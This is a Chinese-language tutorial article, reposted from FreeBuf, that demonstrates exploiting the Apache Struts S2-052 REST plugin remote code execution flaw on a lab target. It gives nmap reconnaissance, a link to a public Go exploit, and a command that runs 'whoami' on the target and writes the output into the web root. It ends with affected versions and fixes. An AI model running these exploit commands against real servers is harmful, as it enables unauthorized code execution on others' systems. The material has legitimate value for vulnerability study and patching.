前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Struts S2-052漏洞利用方式实验解析(附EXP)

Struts S2-052漏洞利用方式实验解析(附EXP)

作者头像
FB客服
发布2018-02-27 18:11:01
2.3K0
发布2018-02-27 18:11:01
举报
文章被收录于专栏:FreeBufFreeBuf

Struts2的漏洞之王大之名相信已经家户喻晓了。从S2-003、S2-005、S2-007、S2-008、S2-009、S2-012~S2-016、S2-037、S2-045、S2-048.等等,而2017年9月5日又收到来自Struts2新的“惊喜”——S2-052。

实验环境

靶机:101.200.58.* (win2008x64+tomcat8.5+Struts 2.5.12)

漏洞地址:

http://101.200.58.*:8080/struts2-rest-showcase/orders.xhtml

代码语言:javascript
复制
    ![Clipboard Image.png](http://image.3001.net/images/20170907/15047245718998.png!small)

一、判断操作系统及端口开放:

本机使用nmap识别一下操作系统(重要):

代码语言:javascript
复制
   nmap -o 101.200.58.*

根据下图目标开放的端口(135.139.445.3389)可以知道:目标使用的是windows系统。

二、环境要求及EXP下载:

因为EXP是用go语言编写的,如果你没有go环境的话,需要搭建一下。

Go1.9下载地址: https://www.golangtc.com/static/go/1.9/go1.9.windows-386.zip (32位) https://www.golangtc.com/static/go/1.9/go1.9.windows-amd64.zip(64位) Exp 下载地址:https://github.com/luc10/struts-rce-cve-2017-9805

三、漏洞证明:

EXP使用方法:

代码语言:javascript
复制
   go run main.go -u URL -c “command”

因为这个EXP脚本没实现回显功能,其实我们可以把命令结果输出文件到网站目录下面,这样我们使用浏览器访问这个文件就可以看到回显内容了

执行(windows环境下):

代码语言:javascript
复制
   go run main.go -u http://101.200.58.*:8080/struts2-rest-showcase/orders.xhtml -c "cmd /c  whoami >>.\webapps\ROOT\cmd.txt"

执行后,我们访问地址:http://101.200.58.*:8080/cmd.txt

发现命令的执行成功的结果已经写入到网站根目录下的cmd.txt,并且权限是最高权限。

四、控制服务器:

*为防止恶意利用,此实验具体内容隐藏

漏洞影响

Struts 2.5 – Struts 2.5.12 版本,可能影响到 2.3.33 版本。

解决方案

1.建议尽快升级到 2.5.13版本。

2.在不使用时删除 Struts REST插件,或仅限于服务器普通页面和JSONs:

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-09-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 实验环境
    • 一、判断操作系统及端口开放:
      • 二、环境要求及EXP下载:
        • 三、漏洞证明:
          • 四、控制服务器:
          • 漏洞影响
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档